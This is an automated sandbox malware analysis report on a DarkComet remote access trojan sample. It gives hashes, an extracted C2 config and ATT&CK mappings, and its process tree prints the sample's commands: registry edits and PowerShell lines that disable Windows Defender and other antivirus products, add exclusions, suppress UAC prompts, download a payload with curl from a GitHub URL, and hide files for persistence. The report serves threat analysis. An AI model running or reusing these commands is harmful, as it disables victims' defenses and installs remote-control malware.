darkcomet | e9fb20dda9f6e356a21dc67a63ab4df04c2a38af8e0fc2acb7d9e01bd6864749

Analysis

max time kernel
150s
max time network
126s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
15-03-2023 11:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe
Size

142KB
MD5

824247ace17fdb122110cf96aba85484
SHA1

8b6a758d3fef912321d127c3a9da0a77af8e574e
SHA256

e9fb20dda9f6e356a21dc67a63ab4df04c2a38af8e0fc2acb7d9e01bd6864749
SHA512

5d1862e383e1ff21f639842dd22126480a993a31060e50e5a102a41ecdc41077f179aec105abd084354112519cd34c89676164f43114b8c589ffd66ce918c715
SSDEEP

3072:d7DhdC6kzWypvaQ0FxyNTBfNU/JMQNX1j8KCOdW6m1cTxotQX:dBlkZvaF4NTB1U/JM8XaOdW6miTEQX

Score

10^/10

darkcomet microsoft evasion persistence rat trojan

Malware Config

Extracted

Family

darkcomet

Botnet

Microsoft

mafafa9090-59805.portmap.io:59805

Mutex

DC_MUTEX-SYYFNJW

Attributes

InstallPath
Microsoft.exe
gencode
PCo28LJinyik
install
true
offline_keylogger
false
persistence
true
reg_key
Microsoft

Signatures

Darkcomet
DarkComet is a remote access trojan (RAT) developed by Jean-Pierre Lesueur.
trojan rat darkcomet

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

program.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Microsoft.exe"	program.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

Windows security bypass 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp = "0"	reg.exe

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

Microsoft.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Microsoft.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

360 attrib.exe
3904 attrib.exe

pid	process
360	attrib.exe
3904	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

program.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	program.exe

Drops startup file 4 IoCs

Processes:

powershell.execmd.exeattrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\program.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe	attrib.exe

Executes dropped EXE 2 IoCs

Processes:

program.exeMicrosoft.exe

pid process

3736 program.exe
2116 Microsoft.exe

pid	process
3736	program.exe
2116	Microsoft.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

program.exeMicrosoft.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Windows\\system32\\Microsoft.exe"	program.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Windows\\system32\\Microsoft.exe"	Microsoft.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 3 IoCs

Processes:

program.exe

description	ioc	process
File created	C:\Windows\SysWOW64\Microsoft.exe	program.exe
File opened for modification	C:\Windows\SysWOW64\Microsoft.exe	program.exe
File opened for modification	C:\Windows\SysWOW64\	program.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

program.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ program.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3256 powershell.exe
3256 powershell.exe
636 powershell.exe
636 powershell.exe
4248 powershell.exe
4248 powershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	program.exe

pid	process
3256	powershell.exe
3256	powershell.exe
636	powershell.exe
636	powershell.exe
4248	powershell.exe
4248	powershell.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

powershell.exepowershell.exepowershell.exeprogram.exeMicrosoft.exe

description	pid	process
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	636	powershell.exe
Token: SeDebugPrivilege	4248	powershell.exe
Token: SeIncreaseQuotaPrivilege	3736	program.exe
Token: SeSecurityPrivilege	3736	program.exe
Token: SeTakeOwnershipPrivilege	3736	program.exe
Token: SeLoadDriverPrivilege	3736	program.exe
Token: SeSystemProfilePrivilege	3736	program.exe
Token: SeSystemtimePrivilege	3736	program.exe
Token: SeProfSingleProcessPrivilege	3736	program.exe
Token: SeIncBasePriorityPrivilege	3736	program.exe
Token: SeCreatePagefilePrivilege	3736	program.exe
Token: SeBackupPrivilege	3736	program.exe
Token: SeRestorePrivilege	3736	program.exe
Token: SeShutdownPrivilege	3736	program.exe
Token: SeDebugPrivilege	3736	program.exe
Token: SeSystemEnvironmentPrivilege	3736	program.exe
Token: SeChangeNotifyPrivilege	3736	program.exe
Token: SeRemoteShutdownPrivilege	3736	program.exe
Token: SeUndockPrivilege	3736	program.exe
Token: SeManageVolumePrivilege	3736	program.exe
Token: SeImpersonatePrivilege	3736	program.exe
Token: SeCreateGlobalPrivilege	3736	program.exe
Token: 33	3736	program.exe
Token: 34	3736	program.exe
Token: 35	3736	program.exe
Token: 36	3736	program.exe
Token: SeIncreaseQuotaPrivilege	2116	Microsoft.exe
Token: SeSecurityPrivilege	2116	Microsoft.exe
Token: SeTakeOwnershipPrivilege	2116	Microsoft.exe
Token: SeLoadDriverPrivilege	2116	Microsoft.exe
Token: SeSystemProfilePrivilege	2116	Microsoft.exe
Token: SeSystemtimePrivilege	2116	Microsoft.exe
Token: SeProfSingleProcessPrivilege	2116	Microsoft.exe
Token: SeIncBasePriorityPrivilege	2116	Microsoft.exe
Token: SeCreatePagefilePrivilege	2116	Microsoft.exe
Token: SeBackupPrivilege	2116	Microsoft.exe
Token: SeRestorePrivilege	2116	Microsoft.exe
Token: SeShutdownPrivilege	2116	Microsoft.exe
Token: SeDebugPrivilege	2116	Microsoft.exe
Token: SeSystemEnvironmentPrivilege	2116	Microsoft.exe
Token: SeChangeNotifyPrivilege	2116	Microsoft.exe
Token: SeRemoteShutdownPrivilege	2116	Microsoft.exe
Token: SeUndockPrivilege	2116	Microsoft.exe
Token: SeManageVolumePrivilege	2116	Microsoft.exe
Token: SeImpersonatePrivilege	2116	Microsoft.exe
Token: SeCreateGlobalPrivilege	2116	Microsoft.exe
Token: 33	2116	Microsoft.exe
Token: 34	2116	Microsoft.exe
Token: 35	2116	Microsoft.exe
Token: 36	2116	Microsoft.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.execmd.exenet.exe

description	pid	process	target process
PID 2060 wrote to memory of 1616	2060	6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe	cmd.exe
PID 2060 wrote to memory of 1616	2060	6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe	cmd.exe
PID 1616 wrote to memory of 1060	1616	cmd.exe	net.exe
PID 1616 wrote to memory of 1060	1616	cmd.exe	net.exe
PID 1060 wrote to memory of 1376	1060	net.exe	net1.exe
PID 1060 wrote to memory of 1376	1060	net.exe	net1.exe
PID 1616 wrote to memory of 2372	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 2372	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 2880	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 2880	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4132	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4132	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 3696	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 3696	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4456	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4456	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4576	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4576	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 244	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 244	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 236	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 236	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 116	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 116	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4948	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4948	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 1996	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 1996	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 792	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 792	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 1956	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 1956	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4752	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4752	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 2172	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 2172	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 444	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 444	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 3888	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 3888	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4152	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4152	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 2108	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 2108	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 3256	1616	cmd.exe	powershell.exe
PID 1616 wrote to memory of 3256	1616	cmd.exe	powershell.exe
PID 1616 wrote to memory of 3508	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 3508	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 696	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 696	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 1916	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 1916	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 328	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 328	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 636	1616	cmd.exe	powershell.exe
PID 1616 wrote to memory of 636	1616	cmd.exe	powershell.exe
PID 1616 wrote to memory of 4528	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4528	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4796	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4796	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 5080	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 5080	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4864	1616	cmd.exe	reg.exe
PID 1616 wrote to memory of 4864	1616	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exe

pid process

360 attrib.exe
3904 attrib.exe
4632 attrib.exe

pid	process
360	attrib.exe
3904	attrib.exe
4632	attrib.exe

C:\Users\Admin\AppData\Local\Temp\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe
"C:\Users\Admin\AppData\Local\Temp\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2060

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8254.tmp\8265.tmp\8266.bat C:\Users\Admin\AppData\Local\Temp\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe"
2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\system32\net.exe
net session
3⤵
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
4⤵
PID:1376

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:2372

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2880

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
3⤵
PID:4132

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3696

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4456

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4576

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:244

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
3⤵
PID:236

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
3⤵
PID:116

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\AVAST Software\Avast" /v DisableAntiVirus /t REG_DWORD /d 1 /f
3⤵
PID:4948

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\McAfee\Endpoint\AV" /v EnableOnAccessScan /t REG_DWORD /d 0 /f
3⤵
PID:1996

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Symantec\Symantec Endpoint Protection\SMC" /v smc_enable /t REG_DWORD /d 0 /f
3⤵
PID:792

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc." /v AllowUnloading /t REG_DWORD /d 1 /f
3⤵
PID:1956

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\SafeDog" /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:4752

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\protected\AVP13\settings" /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:2172

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\SecureMac" /v GlobalSwitch /t REG_DWORD /d 0 /f
3⤵
PID:444

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\Symantec Endpoint Protection\AV" /v EnableAutoProtect /t REG_DWORD /d 0 /f
3⤵
PID:3888

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 5 /f
3⤵
PID:4152

C:\Windows\system32\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\FeatureManagement\Overrides\0\2093230218" /v EnabledState /t REG_DWORD /d 0 /f
3⤵
PID:2108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-MpPreference -DisableTamperProtection $true"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3256

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
3⤵
PID:3508

C:\Windows\system32\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d 4 /f
3⤵
PID:696

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "4" /f
3⤵
PID:1916

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t REG_DWORD /d "2" /f
3⤵
PID:328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v FilterAdministratorToken /t REG_DWORD /d 1 /f
3⤵
PID:4528

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
3⤵
- UAC bypass
PID:4796

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v ""C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"" /t REG_DWORD /d "0" /f
3⤵
PID:5080

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v ""C:\Users\Admin\AppData\Local\Temp"" /t REG_DWORD /d "0" /f
3⤵
- Windows security bypass
PID:4864

C:\Windows\system32\curl.exe
curl -L https://raw.githubusercontent.com/maxavison7/nothing/main/Microsoft.exe --output "C:\Users\Admin\AppData\Local\Temp\program.exe"
3⤵
PID:4500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut(\""C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\program.lnk"\"); $s.TargetPath = \""C:\Users\Admin\AppData\Local\Temp\program.exe"\"; $s.WorkingDirectory = \""C:\Users\Admin\AppData\Local\Temp"\"; $s.IconLocation = \""C:\Users\Admin\AppData\Local\Temp\program.exe"\"; $s.Save()"
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4248

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:4632

C:\Users\Admin\AppData\Local\Temp\program.exe
"C:\Users\Admin\AppData\Local\Temp\program.exe"
3⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3736

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\Temp\program.exe" +s +h
4⤵
PID:3776

C:\Windows\SysWOW64\attrib.exe
attrib "C:\Users\Admin\AppData\Local\Temp\program.exe" +s +h
5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\Temp" +s +h
4⤵
PID:1832

C:\Windows\SysWOW64\attrib.exe
attrib "C:\Users\Admin\AppData\Local\Temp" +s +h
5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3904

C:\Windows\SysWOW64\Microsoft.exe
"C:\Windows\system32\Microsoft.exe"
4⤵
- Disables RegEdit via registry modification
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2116

C:\Windows\SysWOW64\notepad.exe
notepad
5⤵
PID:1792

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Winlogon Helper DLL

T1004

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Bypass User Account Control

T1088

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
c08aea9c78561a5f00398a723fdf2925

SHA1
2c880cbb5d02169a86bb9517ce2a0184cb177c6e

SHA256
63d2688b92da4d1bb69980b7998b9be1595dd9e53951434a9414d019c4f825a7

SHA512
d30db2f55bbda7102ffe90520d233355633313dcc77cdb69a26fdbb56e59dd41793def23d69dc5dc3f94c5bd41d3c26b3628886fd2edbed2df0b332e9a21f95c

Download Submit
C:\Users\Admin\AppData\Local\Temp\8254.tmp\8265.tmp\8266.bat
Filesize
48KB

MD5
a441547bf9949c2903a3eea35ee4da65

SHA1
97eda2f9d21b8e9f44d0695d73d70a406c976b99

SHA256
15c7f95ef37f78ce24d32fd5bc473e8bbec4e25fe10ebf5aab9c94155326b82d

SHA512
9dabae688c3a46f192363cc1bdebf53ad62fc79b966e3d32a38fc2bf02e0a6f9d2aab23a8c8d9ce00ba1b1ae22b331838032a16f8a8a5b784ef4b6a701d28a3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5trvpclw.d2y.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\program.exe
Filesize
780KB

MD5
aceeb574066c69e3ef181dacc559e418

SHA1
1c8f6c838951c4b344e69db7cba27ab04cc48235

SHA256
fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e

SHA512
0c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97

Download Submit
C:\Users\Admin\AppData\Local\Temp\program.exe
Filesize
780KB

MD5
aceeb574066c69e3ef181dacc559e418

SHA1
1c8f6c838951c4b344e69db7cba27ab04cc48235

SHA256
fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e

SHA512
0c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe
Filesize
142KB

MD5
824247ace17fdb122110cf96aba85484

SHA1
8b6a758d3fef912321d127c3a9da0a77af8e574e

SHA256
e9fb20dda9f6e356a21dc67a63ab4df04c2a38af8e0fc2acb7d9e01bd6864749

SHA512
5d1862e383e1ff21f639842dd22126480a993a31060e50e5a102a41ecdc41077f179aec105abd084354112519cd34c89676164f43114b8c589ffd66ce918c715

Download Submit
C:\Windows\SysWOW64\Microsoft.exe
Filesize
780KB

MD5
aceeb574066c69e3ef181dacc559e418

SHA1
1c8f6c838951c4b344e69db7cba27ab04cc48235

SHA256
fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e

SHA512
